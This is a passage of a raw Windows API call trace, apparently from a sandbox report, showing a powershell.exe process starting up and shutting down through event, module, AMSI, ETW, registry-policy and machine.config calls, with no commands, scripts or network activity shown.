(lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa5c [0287.544] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb40 [0287.544] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb10 [0287.544] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb30 [0287.544] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x998 [0287.544] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa98 [0287.544] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xab8 [0287.544] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb34 [0287.544] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xaf0 [0287.545] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x990 [0287.545] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xad8 [0287.545] SetEvent (hEvent=0xb10) returned 1 [0287.545] SetEvent (hEvent=0xa18) returned 1 [0287.545] SetEvent (hEvent=0xa5c) returned 1 [0287.545] SetEvent (hEvent=0xb40) returned 1 [0287.545] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa64 [0287.546] SetEvent (hEvent=0x704) returned 1 [0287.785] SetEvent (hEvent=0xb30) returned 1 [0287.785] SetEvent (hEvent=0x998) returned 1 [0287.786] SetEvent (hEvent=0xa98) returned 1 [0287.998] CoCreateGuid (in: pguid=0x653dedc6f8 | out: pguid=0x653dedc6f8*(Data1=0x47394809, Data2=0x5246, Data3=0x4d76, Data4=([0]=0xac, [1]=0x1b, [2]=0x65, [3]=0x30, [4]=0xf0, [5]=0x18, [6]=0xeb, [7]=0x5d))) returned 0x0 [0288.036] ReportEventW (hEventLog=0x25b73a30008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x25b5c19a350*="Stopped", lpRawData=0x25b5c19a1b8) returned 1 [0288.043] SetEvent (hEvent=0x704) returned 1 [0288.157] CloseHandle (hObject=0x704) returned 1 [0288.158] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0288.163] CoGetContextToken (in: pToken=0x653dedf480 | out: pToken=0x653dedf480) returned 0x0 [0288.163] CObjectContext::QueryInterface () returned 0x0 [0288.163] CObjectContext::GetCurrentThreadType () returned 0x0 [0288.163] Release () returned 0x0 [0288.164] CoGetContextToken (in: pToken=0x653dedef90 | out: pToken=0x653dedef90) returned 0x0 [0288.164] CObjectContext::QueryInterface () returned 0x0 [0288.164] CObjectContext::GetCurrentThreadType () returned 0x0 [0288.164] Release () returned 0x0 [0288.171] CoGetContextToken (in: pToken=0x653dedef90 | out: pToken=0x653dedef90) returned 0x0 [0288.171] CObjectContext::QueryInterface () returned 0x0 [0288.171] CObjectContext::GetCurrentThreadType () returned 0x0 [0288.171] Release () returned 0x0 [0288.333] CoGetContextToken (in: pToken=0x653dedef90 | out: pToken=0x653dedef90) returned 0x0 [0288.333] CObjectContext::QueryInterface () returned 0x0 [0288.333] CObjectContext::GetCurrentThreadType () returned 0x0 [0288.333] Release () returned 0x0 [0288.358] CoGetContextToken (in: pToken=0x653dedefb0 | out: pToken=0x653dedefb0) returned 0x0 [0288.358] CObjectContext::QueryInterface () returned 0x0 [0288.358] CObjectContext::GetCurrentThreadType () returned 0x0 [0288.358] Release () returned 0x0 [0288.358] CoUninitialize () Thread: id = 25 os_tid = 0x11e4 Thread: id = 26 os_tid = 0x11dc Thread: id = 27 os_tid = 0x111c Thread: id = 28 os_tid = 0x12b0 Thread: id = 29 os_tid = 0x10bc Thread: id = 30 os_tid = 0x1308 Thread: id = 31 os_tid = 0x11b0 [0288.332] CoGetContextToken (in: pToken=0x653e47f810 | out: pToken=0x653e47f810) returned 0x0 [0288.332] CObjectContext::QueryInterface () returned 0x0 [0288.332] CObjectContext::GetCurrentThreadType () returned 0x0 [0288.332] Release () returned 0x0 Thread: id = 32 os_tid = 0x1288 Thread: id = 33 os_tid = 0x1344 Thread: id = 34 os_tid = 0x127c Thread: id = 35 os_tid = 0x8fc [0213.197] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.540] CoCreateGuid (in: pguid=0x653ef8ea08 | out: pguid=0x653ef8ea08*(Data1=0x3a08d6c6, Data2=0x7bb4, Data3=0x4609, Data4=([0]=0xae, [1]=0x50, [2]=0x55, [3]=0xb5, [4]=0xcf, [5]=0xb1, [6]=0x1b, [7]=0xb5))) returned 0x0 [0213.566] GetCurrentProcessId () returned 0x61c [0213.566] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x61c) returned 0x744 [0213.566] EnumProcessModules (in: hProcess=0x744, lphModule=0x25b5c2ce488, cb=0x200, lpcbNeeded=0x653ef8e7f0 | out: lphModule=0x25b5c2ce488, lpcbNeeded=0x653ef8e7f0) returned 1 [0213.568] EnumProcessModules (in: hProcess=0x744, lphModule=0x25b5c2ce6a0, cb=0x400, lpcbNeeded=0x653ef8e7f0 | out: lphModule=0x25b5c2ce6a0, lpcbNeeded=0x653ef8e7f0) returned 1 [0213.569] GetModuleInformation (in: hProcess=0x744, hModule=0x7ff6aba70000, lpmodinfo=0x25b5c2ceb10, cb=0x18 | out: lpmodinfo=0x25b5c2ceb10*(lpBaseOfDll=0x7ff6aba70000, SizeOfImage=0x78000, EntryPoint=0x7ff6aba731a0)) returned 1 [0213.569] CoTaskMemAlloc (cb=0x804) returned 0x25b738e3130 [0213.569] GetModuleBaseNameW (in: hProcess=0x744, hModule=0x7ff6aba70000, lpBaseName=0x25b738e3130, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0213.570] CoTaskMemFree (pv=0x25b738e3130) [0213.570] CoTaskMemAlloc (cb=0x804) returned 0x25b738e4960 [0213.570] GetModuleFileNameExW (in: hProcess=0x744, hModule=0x7ff6aba70000, lpFilename=0x25b738e4960, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0213.570] CoTaskMemFree (pv=0x25b738e4960) [0213.570] CloseHandle (hObject=0x744) returned 1 [0213.570] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x61c) returned 0x744 [0213.570] EnumProcessModules (in: hProcess=0x744, lphModule=0x25b5c2d0d78, cb=0x200, lpcbNeeded=0x653ef8e7f0 | out: lphModule=0x25b5c2d0d78, lpcbNeeded=0x653ef8e7f0) returned 1 [0213.572] EnumProcessModules (in: hProcess=0x744, lphModule=0x25b5c2d0f90, cb=0x400, lpcbNeeded=0x653ef8e7f0 | out: lphModule=0x25b5c2d0f90, lpcbNeeded=0x653ef8e7f0) returned 1 [0213.573] GetModuleInformation (in: hProcess=0x744, hModule=0x7ff6aba70000, lpmodinfo=0x25b5c2d1400, cb=0x18 | out: lpmodinfo=0x25b5c2d1400*(lpBaseOfDll=0x7ff6aba70000, SizeOfImage=0x78000, EntryPoint=0x7ff6aba731a0)) returned 1 [0213.573] CoTaskMemAlloc (cb=0x804) returned 0x25b738e3130 [0213.573] GetModuleBaseNameW (in: hProcess=0x744, hModule=0x7ff6aba70000, lpBaseName=0x25b738e3130, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0213.574] CoTaskMemFree (pv=0x25b738e3130) [0213.575] CoTaskMemAlloc (cb=0x804) returned 0x25b738e3130 [0213.575] GetModuleFileNameExW (in: hProcess=0x744, hModule=0x7ff6aba70000, lpFilename=0x25b738e3130, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0213.575] CoTaskMemFree (pv=0x25b738e3130) [0213.575] CloseHandle (hObject=0x744) returned 1 [0213.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x653ef8e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0213.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e6f0) returned 1 [0213.578] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e7d0 | out: lpFileInformation=0x653ef8e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2c94e9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a00)) returned 1 [0213.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e6b0) returned 1 [0213.578] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x653ef8e8a8 | out: lpdwHandle=0x653ef8e8a8) returned 0x73c [0213.578] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x73c, lpData=0x25b5c2d3780 | out: lpData=0x25b5c2d3780) returned 1 [0213.578] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x653ef8e828, puLen=0x653ef8e820 | out: lplpBuffer=0x653ef8e828*=0x25b5c2d3b18, puLen=0x653ef8e820) returned 1 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x25b5c2d3838, puLen=0x653ef8e7c0) returned 1 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x25b5c2d388c, puLen=0x653ef8e7c0) returned 1 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x25b5c2d38d4, puLen=0x653ef8e7c0) returned 1 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x25b5c2d3944, puLen=0x653ef8e7c0) returned 1 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x25b5c2d3980, puLen=0x653ef8e7c0) returned 1 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x25b5c2d3a04, puLen=0x653ef8e7c0) returned 1 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x25b5c2d3a4c, puLen=0x653ef8e7c0) returned 1 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x25b5c2d3abc, puLen=0x653ef8e7c0) returned 1 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x0, puLen=0x653ef8e7c0) returned 0 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x0, puLen=0x653ef8e7c0) returned 0 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x0, puLen=0x653ef8e7c0) returned 0 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x0, puLen=0x653ef8e7c0) returned 0 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x653ef8e778, puLen=0x653ef8e770 | out: lplpBuffer=0x653ef8e778*=0x25b5c2d3b18, puLen=0x653ef8e770) returned 1 [0213.579] VerLanguageNameW (in: wLang=0x409, szLang=0x653ef8e4a0, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0213.579] VerQueryValueW (in: pBlock=0x25b5c2d3780, lpSubBlock="\\", lplpBuffer=0x653ef8e7c8, puLen=0x653ef8e7c0 | out: lplpBuffer=0x653ef8e7c8*=0x25b5c2d37a8, puLen=0x653ef8e7c0) returned 1 [0213.596] AmsiInitialize () returned 0x0 [0213.611] AmsiOpenSession () returned 0x0 [0213.612] AmsiScanString () returned 0x80070015 [0213.683] EtwEventRegister () returned 0x0 [0213.684] EtwEventSetInformation () returned 0x0 [0213.694] RoGetParameterizedTypeInstanceIID () returned 0x0 [0213.694] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0213.694] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0213.711] WindowsCreateStringReference () returned 0x0 [0213.711] RoGetActivationFactory () returned 0x0 [0213.713] QueryInterface () returned 0x0 [0213.713] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0213.713] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0213.713] QueryInterface () returned 0x0 [0213.713] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::GetRuntimeClassName () returned 0x8000000e [0213.713] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0213.714] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::AddRef () returned 0x4 [0213.714] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0213.714] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0213.714] Release () returned 0x4 [0213.714] CoGetContextToken (in: pToken=0x653ef8c460 | out: pToken=0x653ef8c460) returned 0x0 [0213.714] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0213.714] CoGetContextToken (in: pToken=0x653ef8c6b0 | out: pToken=0x653ef8c6b0) returned 0x0 [0213.714] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0213.714] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x4 [0213.714] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0213.715] WindowsDeleteString () returned 0x0 [0213.715] Release () returned 0x2 [0213.715] CoGetContextToken (in: pToken=0x653ef8d0d0 | out: pToken=0x653ef8d0d0) returned 0x0 [0213.715] CoGetContextToken (in: pToken=0x653ef8cfd0 | out: pToken=0x653ef8cfd0) returned 0x0 [0213.715] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0213.715] AddRef () returned 0x4 [0213.715] Release () returned 0x3 [0213.727] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::add_TracingStatusChanged () returned 0x0 [0213.798] GenericStreamBase::Write () returned 0x0 [0213.798] GenericStreamBase::Write () returned 0x0 [0213.798] CoCreateGuid (in: pguid=0x7fffd333e6a0 | out: pguid=0x7fffd333e6a0*(Data1=0xe891de2e, Data2=0xae39, Data3=0x4318, Data4=([0]=0xad, [1]=0x53, [2]=0x6c, [3]=0x6f, [4]=0x8, [5]=0x88, [6]=0x8a, [7]=0x17))) returned 0x0 [0213.798] GenericStreamBase::Write () returned 0x0 [0213.800] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0213.801] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x3 [0213.801] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0213.801] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0213.801] Release () returned 0x3 [0213.801] CoGetContextToken (in: pToken=0x653ef8c210 | out: pToken=0x653ef8c210) returned 0x0 [0213.801] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0213.803] WindowsCreateString () returned 0x0 [0213.803] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x4 [0213.804] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x3 [0213.804] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::get_Enabled () returned 0x0 [0214.685] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x25b7393fbc0 [0214.686] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x25b73941760 [0215.470] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef8e750, nSize=0x80 | out: lpBuffer="") returned 0x0 [0215.604] EtwEventActivityIdControl () returned 0x0 [0215.604] EtwEventActivityIdControl () returned 0x0 [0215.604] EtwEventActivityIdControl () returned 0x0 [0215.610] EtwEventActivityIdControl () returned 0x0 [0215.610] EtwEventActivityIdControl () returned 0x0 [0215.610] EtwEventActivityIdControl () returned 0x0 [0215.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x653ef8d670, nSize=0x80 | out: lpBuffer="") returned 0x0 [0215.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x653ef8d670, nSize=0x80 | out: lpBuffer="") returned 0x0 [0215.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x653ef8d6d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0215.739] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8e7e8 | out: phkResult=0x653ef8e7e8*=0x0) returned 0x2 [0215.740] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8e7e8 | out: phkResult=0x653ef8e7e8*=0x0) returned 0x2 [0215.741] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\EventLog\\ProtectedEventLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8e758 | out: phkResult=0x653ef8e758*=0x0) returned 0x2 [0215.741] EtwEventWriteTransfer () returned 0x0 [0215.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x653ef8d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0224.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x653ef8dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0224.099] CoTaskMemAlloc (cb=0x20c) returned 0x25b739d9ce0 [0224.100] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x25b739d9ce0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0224.100] CoTaskMemFree (pv=0x25b739d9ce0) [0224.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x653ef8dd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0224.129] GetCurrentProcess () returned 0xffffffffffffffff [0224.129] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8df58 | out: TokenHandle=0x653ef8df58*=0x6f4) returned 1 [0224.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x653ef8d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30 [0224.134] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e000 | out: lpFileInformation=0x653ef8e000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0224.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x653ef8d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0224.137] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dff8 | out: lpFileInformation=0x653ef8dff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0224.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x653ef8d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0224.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0224.137] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7c4 [0224.138] GetFileType (hFile=0x7c4) returned 0x1 [0224.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dde0) returned 1 [0224.138] GetFileType (hFile=0x7c4) returned 0x1 [0224.140] GetFileSize (in: hFile=0x7c4, lpFileSizeHigh=0x653ef8df48 | out: lpFileSizeHigh=0x653ef8df48*=0x0) returned 0x8c8f [0224.140] ReadFile (in: hFile=0x7c4, lpBuffer=0x25b5bd82ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8deb8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bd82ec8*, lpNumberOfBytesRead=0x653ef8deb8*=0x1000, lpOverlapped=0x0) returned 1 [0224.149] ReadFile (in: hFile=0x7c4, lpBuffer=0x25b5bd82ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dc98, lpOverlapped=0x0 | out: lpBuffer=0x25b5bd82ec8*, lpNumberOfBytesRead=0x653ef8dc98*=0x1000, lpOverlapped=0x0) returned 1 [0224.150] ReadFile (in: hFile=0x7c4, lpBuffer=0x25b5bd82ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8da88, lpOverlapped=0x0 | out: lpBuffer=0x25b5bd82ec8*, lpNumberOfBytesRead=0x653ef8da88*=0x1000, lpOverlapped=0x0) returned 1 [0224.151] ReadFile (in: hFile=0x7c4, lpBuffer=0x25b5bd82ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8da88, lpOverlapped=0x0 | out: lpBuffer=0x25b5bd82ec8*, lpNumberOfBytesRead=0x653ef8da88*=0x1000, lpOverlapped=0x0) returned 1 [0224.151] ReadFile (in: hFile=0x7c4, lpBuffer=0x25b5bd82ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8da88, lpOverlapped=0x0 | out: lpBuffer=0x25b5bd82ec8*, lpNumberOfBytesRead=0x653ef8da88*=0x1000, lpOverlapped=0x0) returned 1 [0224.151] ReadFile (in: hFile=0x7c4, lpBuffer=0x25b5bd82ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d948, lpOverlapped=0x0 | out: lpBuffer=0x25b5bd82ec8*, lpNumberOfBytesRead=0x653ef8d948*=0x1000, lpOverlapped=0x0) returned 1 [0224.162] ReadFile (in: hFile=0x7c4, lpBuffer=0x25b5bd82ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8db88, lpOverlapped=0x0 | out: lpBuffer=0x25b5bd82ec8*, lpNumberOfBytesRead=0x653ef8db88*=0x1000, lpOverlapped=0x0) returned 1 [0224.175] ReadFile (in: hFile=0x7c4, lpBuffer=0x25b5bd82ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8da38, lpOverlapped=0x0 | out: lpBuffer=0x25b5bd82ec8*, lpNumberOfBytesRead=0x653ef8da38*=0x1000, lpOverlapped=0x0) returned 1 [0224.175] ReadFile (in: hFile=0x7c4, lpBuffer=0x25b5bd82ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8da38, lpOverlapped=0x0 | out: lpBuffer=0x25b5bd82ec8*, lpNumberOfBytesRead=0x653ef8da38*=0xc8f, lpOverlapped=0x0) returned 1 [0224.175] ReadFile (in: hFile=0x7c4, lpBuffer=0x25b5bd82ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8db58, lpOverlapped=0x0 | out: lpBuffer=0x25b5bd82ec8*, lpNumberOfBytesRead=0x653ef8db58*=0x0, lpOverlapped=0x0) returned 1 [0224.176] CloseHandle (hObject=0x7c4) returned 1 [0224.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x653ef8dd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0224.178] CoTaskMemAlloc (cb=0x20c) returned 0x25b739d8e00 [0224.178] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x25b739d8e00, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0224.178] CoTaskMemFree (pv=0x25b739d8e00) [0224.178] GetFullPathNameW (in: 